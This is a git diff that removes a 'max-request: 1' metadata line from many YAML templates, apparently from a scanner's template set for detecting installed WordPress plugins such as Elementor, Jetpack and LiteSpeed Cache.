diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml
index af30ca76b6..6559e64dce 100644
--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-page/
   metadata:
-    max-request: 1
     plugin_namespace: duplicate-page
     wpscan: https://wpscan.com/plugin/duplicate-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml
index 93823466d4..a4368b8aa6 100644
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-post/
   metadata:
-    max-request: 1
     plugin_namespace: duplicate-post
     wpscan: https://wpscan.com/plugin/duplicate-post
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml
index e224283ecd..ec119e762a 100644
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicator/
   metadata:
-    max-request: 1
     plugin_namespace: duplicator
     wpscan: https://wpscan.com/plugin/duplicator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
index 9af8df08a7..b7ec7576a3 100644
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duracelltomi-google-tag-manager/
   metadata:
-    max-request: 1
     plugin_namespace: duracelltomi-google-tag-manager
     wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml
index d4081474c3..c42d679973 100644
--- a/http/technologies/wordpress/plugins/easy-fancybox.yaml
+++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-fancybox/
   metadata:
-    max-request: 1
     plugin_namespace: easy-fancybox
     wpscan: https://wpscan.com/plugin/easy-fancybox
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
index bcbc0707fb..fc44375947 100644
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-table-of-contents/
   metadata:
-    max-request: 1
     plugin_namespace: easy-table-of-contents
     wpscan: https://wpscan.com/plugin/easy-table-of-contents
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
index 8b23832297..a1616c1741 100644
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-wp-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: easy-wp-smtp
     wpscan: https://wpscan.com/plugin/easy-wp-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml
index f0c3e4bc63..6cfb8bc272 100644
--- a/http/technologies/wordpress/plugins/elementor.yaml
+++ b/http/technologies/wordpress/plugins/elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/elementor/
   metadata:
-    max-request: 1
     plugin_namespace: elementor
     wpscan: https://wpscan.com/plugin/elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml
index eab4a0d725..9caaa53263 100644
--- a/http/technologies/wordpress/plugins/elementskit-lite.yaml
+++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/elementskit-lite/
   metadata:
-    max-request: 1
     plugin_namespace: elementskit-lite
     wpscan: https://wpscan.com/plugin/elementskit-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml
index 74c172ac94..5e6b557952 100644
--- a/http/technologies/wordpress/plugins/enable-media-replace.yaml
+++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/enable-media-replace/
   metadata:
-    max-request: 1
     plugin_namespace: enable-media-replace
     wpscan: https://wpscan.com/plugin/enable-media-replace
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml
index f5a63a2ed2..c5a665e6f7 100644
--- a/http/technologies/wordpress/plugins/envato-elements.yaml
+++ b/http/technologies/wordpress/plugins/envato-elements.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/envato-elements/
   metadata:
-    max-request: 1
     plugin_namespace: envato-elements
     wpscan: https://wpscan.com/plugin/envato-elements
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
index 25ca7328ef..a8b56b5df0 100644
--- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
+++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/essential-addons-for-elementor-lite/
   metadata:
-    max-request: 1
     plugin_namespace: essential-addons-for-elementor-lite
     wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
index cb1db5bee6..4e20e57107 100644
--- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
+++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ewww-image-optimizer/
   metadata:
-    max-request: 1
     plugin_namespace: ewww-image-optimizer
     wpscan: https://wpscan.com/plugin/ewww-image-optimizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
index a3207ea16a..6f6a416595 100644
--- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/facebook-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: facebook-for-woocommerce
     wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
index 2a4b772078..2dd0ef57b5 100644
--- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml
+++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/fast-indexing-api/
   metadata:
-    max-request: 1
     plugin_namespace: fast-indexing-api
     wpscan: https://wpscan.com/plugin/fast-indexing-api
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
index 366205085d..11942f4fa4 100644
--- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
+++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/favicon-by-realfavicongenerator/
   metadata:
-    max-request: 1
     plugin_namespace: favicon-by-realfavicongenerator
     wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml
index 598f08ce88..87c2aeb4bd 100644
--- a/http/technologies/wordpress/plugins/flamingo.yaml
+++ b/http/technologies/wordpress/plugins/flamingo.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/flamingo/
   metadata:
-    max-request: 1
     plugin_namespace: flamingo
     wpscan: https://wpscan.com/plugin/flamingo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml
index 42cdfb4475..3696eefbf7 100644
--- a/http/technologies/wordpress/plugins/fluentform.yaml
+++ b/http/technologies/wordpress/plugins/fluentform.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/fluentform/
   metadata:
-    max-request: 1
     plugin_namespace: fluentform
     wpscan: https://wpscan.com/plugin/fluentform
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml
index a1af263dbd..8bab0a9c3e 100644
--- a/http/technologies/wordpress/plugins/font-awesome.yaml
+++ b/http/technologies/wordpress/plugins/font-awesome.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/font-awesome/
   metadata:
-    max-request: 1
     plugin_namespace: font-awesome
     wpscan: https://wpscan.com/plugin/font-awesome
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
index 19265f910e..affd270123 100644
--- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/force-regenerate-thumbnails/
   metadata:
-    max-request: 1
     plugin_namespace: force-regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml
index c21d414695..1e6a62e23b 100644
--- a/http/technologies/wordpress/plugins/formidable.yaml
+++ b/http/technologies/wordpress/plugins/formidable.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/formidable/
   metadata:
-    max-request: 1
     plugin_namespace: formidable
     wpscan: https://wpscan.com/plugin/formidable
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml
index 91c89d0ad8..980265f531 100644
--- a/http/technologies/wordpress/plugins/forminator.yaml
+++ b/http/technologies/wordpress/plugins/forminator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/forminator/
   metadata:
-    max-request: 1
     plugin_namespace: forminator
     wpscan: https://wpscan.com/plugin/forminator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
index 539d9f7cec..daf205789d 100644
--- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml
+++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ga-google-analytics/
   metadata:
-    max-request: 1
     plugin_namespace: ga-google-analytics
     wpscan: https://wpscan.com/plugin/ga-google-analytics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
index f4123bb594..22bfa3ffe2 100644
--- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
+++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gdpr-cookie-compliance/
   metadata:
-    max-request: 1
     plugin_namespace: gdpr-cookie-compliance
     wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
index 254f916291..7ed171d662 100644
--- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
   metadata:
-    max-request: 1
     plugin_namespace: google-analytics-dashboard-for-wp
     wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
index 8074ac337e..ad238445fc 100644
--- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-for-wordpress/
   metadata:
-    max-request: 1
     plugin_namespace: google-analytics-for-wordpress
     wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
index b9de0ee313..7161671960 100644
--- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
+++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-listings-and-ads/
   metadata:
-    max-request: 1
     plugin_namespace: google-listings-and-ads
     wpscan: https://wpscan.com/plugin/google-listings-and-ads
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml
index 7b0f188ff7..2678f603c6 100644
--- a/http/technologies/wordpress/plugins/google-site-kit.yaml
+++ b/http/technologies/wordpress/plugins/google-site-kit.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-site-kit/
   metadata:
-    max-request: 1
     plugin_namespace: google-site-kit
     wpscan: https://wpscan.com/plugin/google-site-kit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
index 898e4de56d..20d947a5d1 100644
--- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-sitemap-generator/
   metadata:
-    max-request: 1
     plugin_namespace: google-sitemap-generator
     wpscan: https://wpscan.com/plugin/google-sitemap-generator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml
index 4a76856a69..22ee97b51f 100644
--- a/http/technologies/wordpress/plugins/gtranslate.yaml
+++ b/http/technologies/wordpress/plugins/gtranslate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gtranslate/
   metadata:
-    max-request: 1
     plugin_namespace: gtranslate
     wpscan: https://wpscan.com/plugin/gtranslate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml
index b321ca63eb..3f4c6c8936 100644
--- a/http/technologies/wordpress/plugins/gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: gutenberg
     wpscan: https://wpscan.com/plugin/gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
index 2b42c9f80c..fa1bb64115 100644
--- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
+++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/happy-elementor-addons/
   metadata:
-    max-request: 1
     plugin_namespace: happy-elementor-addons
     wpscan: https://wpscan.com/plugin/happy-elementor-addons
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
index dbea07a6da..da63d1cbf6 100644
--- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-code-manager/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer-code-manager
     wpscan: https://wpscan.com/plugin/header-footer-code-manager
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
index 17a8f220cf..f94e7f6494 100644
--- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-elementor/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer-elementor
     wpscan: https://wpscan.com/plugin/header-footer-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml
index 956a08b32d..95d2aa5f16 100644
--- a/http/technologies/wordpress/plugins/header-footer.yaml
+++ b/http/technologies/wordpress/plugins/header-footer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer/
   metadata:
-    max-request: 1
     plugin_namespace: header-footer
     wpscan: https://wpscan.com/plugin/header-footer
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml
index 5a570b9077..af8193b875 100644
--- a/http/technologies/wordpress/plugins/health-check.yaml
+++ b/http/technologies/wordpress/plugins/health-check.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/health-check/
   metadata:
-    max-request: 1
     plugin_namespace: health-check
     wpscan: https://wpscan.com/plugin/health-check
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml
index 4ecac0cd92..8d7e45818b 100644
--- a/http/technologies/wordpress/plugins/hello-dolly.yaml
+++ b/http/technologies/wordpress/plugins/hello-dolly.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/hello-dolly/
   metadata:
-    max-request: 1
     plugin_namespace: hello-dolly
     wpscan: https://wpscan.com/plugin/hello-dolly
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
index e50f58cef8..ed3967db7b 100644
--- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml
+++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/host-webfonts-local/
   metadata:
-    max-request: 1
     plugin_namespace: host-webfonts-local
     wpscan: https://wpscan.com/plugin/host-webfonts-local
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml
index 031bb48563..2ff5adba86 100644
--- a/http/technologies/wordpress/plugins/imagify.yaml
+++ b/http/technologies/wordpress/plugins/imagify.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/imagify/
   metadata:
-    max-request: 1
     plugin_namespace: imagify
     wpscan: https://wpscan.com/plugin/imagify
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml
index 3cdcf3da93..9099f3c0a5 100644
--- a/http/technologies/wordpress/plugins/imsanity.yaml
+++ b/http/technologies/wordpress/plugins/imsanity.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/imsanity/
   metadata:
-    max-request: 1
     plugin_namespace: imsanity
     wpscan: https://wpscan.com/plugin/imsanity
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
index c222bc9d4a..1ee0e67542 100644
--- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
+++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/insert-headers-and-footers/
   metadata:
-    max-request: 1
     plugin_namespace: insert-headers-and-footers
     wpscan: https://wpscan.com/plugin/insert-headers-and-footers
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml
index 9c6e3e6d2e..1778552d75 100644
--- a/http/technologies/wordpress/plugins/instagram-feed.yaml
+++ b/http/technologies/wordpress/plugins/instagram-feed.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/instagram-feed/
   metadata:
-    max-request: 1
     plugin_namespace: instagram-feed
     wpscan: https://wpscan.com/plugin/instagram-feed
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
index 66b7d6a363..7ba81036cf 100644
--- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/intuitive-custom-post-order/
   metadata:
-    max-request: 1
     plugin_namespace: intuitive-custom-post-order
     wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml
index a36016562d..24fc3e3295 100644
--- a/http/technologies/wordpress/plugins/iwp-client.yaml
+++ b/http/technologies/wordpress/plugins/iwp-client.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/iwp-client/
   metadata:
-    max-request: 1
     plugin_namespace: iwp-client
     wpscan: https://wpscan.com/plugin/iwp-client
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml
index 8033aacbc6..3e89505574 100644
--- a/http/technologies/wordpress/plugins/jetpack-boost.yaml
+++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack-boost/
   metadata:
-    max-request: 1
     plugin_namespace: jetpack-boost
     wpscan: https://wpscan.com/plugin/jetpack-boost
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml
index e4017b1a0a..e701e365ba 100644
--- a/http/technologies/wordpress/plugins/jetpack.yaml
+++ b/http/technologies/wordpress/plugins/jetpack.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack/
   metadata:
-    max-request: 1
     plugin_namespace: jetpack
     wpscan: https://wpscan.com/plugin/jetpack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml
index 53d6d393bd..c0cc5400a8 100644
--- a/http/technologies/wordpress/plugins/kadence-blocks.yaml
+++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/kadence-blocks/
   metadata:
-    max-request: 1
     plugin_namespace: kadence-blocks
     wpscan: https://wpscan.com/plugin/kadence-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml
index c286e9a14f..22687bcffe 100644
--- a/http/technologies/wordpress/plugins/kirki.yaml
+++ b/http/technologies/wordpress/plugins/kirki.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/kirki/
   metadata:
-    max-request: 1
     plugin_namespace: kirki
     wpscan: https://wpscan.com/plugin/kirki
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml
index 364e3cd71e..b69d3d5bfe 100644
--- a/http/technologies/wordpress/plugins/leadin.yaml
+++ b/http/technologies/wordpress/plugins/leadin.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/leadin/
   metadata:
-    max-request: 1
     plugin_namespace: leadin
     wpscan: https://wpscan.com/plugin/leadin
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
index 4fcccbfc33..7975a57702 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts-reloaded/
   metadata:
-    max-request: 1
     plugin_namespace: limit-login-attempts-reloaded
     wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
index 3fbc714d3b..ff4cef94d7 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts/
   metadata:
-    max-request: 1
     plugin_namespace: limit-login-attempts
     wpscan: https://wpscan.com/plugin/limit-login-attempts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml
index c49b506979..a8903697b0 100644
--- a/http/technologies/wordpress/plugins/litespeed-cache.yaml
+++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/litespeed-cache/
   metadata:
-    max-request: 1
     plugin_namespace: litespeed-cache
     wpscan: https://wpscan.com/plugin/litespeed-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml
index dfcaf6f71b..3f141c4476 100644
--- a/http/technologies/wordpress/plugins/loco-translate.yaml
+++ b/http/technologies/wordpress/plugins/loco-translate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/loco-translate/
   metadata:
-    max-request: 1
     plugin_namespace: loco-translate
     wpscan: https://wpscan.com/plugin/loco-translate
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml
index 61be246fee..5355e988a2 100644
--- a/http/technologies/wordpress/plugins/loginizer.yaml
+++ b/http/technologies/wordpress/plugins/loginizer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/loginizer/
   metadata:
-    max-request: 1
     plugin_namespace: loginizer
     wpscan: https://wpscan.com/plugin/loginizer
